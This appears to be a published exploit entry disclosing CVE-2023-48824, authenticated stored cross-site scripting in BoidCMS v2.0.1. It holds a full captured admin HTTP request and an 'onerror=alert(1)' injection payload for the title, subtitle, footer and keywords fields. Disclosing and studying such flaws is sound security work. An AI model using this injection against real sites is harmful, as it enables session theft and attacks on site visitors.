# Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS
# Date: 13/11/2023
# Exploit Author: BugsBD Limited
# Discover by: Rahad Chowdhury
# Vendor Homepage: https://boidcms.github.io/#/
# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip
# Version: v2.0.1
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
# CVE: CVE-2023-48824

Descriptions:
BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting
(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,
keywords" parameters of&nbsp;settings, create page.


Steps to Reproduce:

1. Request:

POST /BoidCMS/admin?page=create HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------9882691211259772119227456445
Content-Length: 1492
Origin: http://192.168.1.74
Connection: close
Referer: http://192.168.1.74/BoidCMS/admin?page=create
Cookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc
Upgrade-Insecure-Requests: 1

-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="type"

post
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="title"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="descr"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="keywords"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="content"

test
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="permalink"


-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="tpl"

theme.php
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="thumb"


-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="date"

2023-12-02T19:41
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="pub"

true
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="token"

83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd
-----------------------------9882691211259772119227456445
Content-Disposition: form-data; name="create"

Create
-----------------------------9882691211259772119227456445--


2. Now use xss payload "><img src=x onerror=alert(1)> on "title,
subtitle, footer, keywords" parameters.
3. Save and check home.



## Reproduce:
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)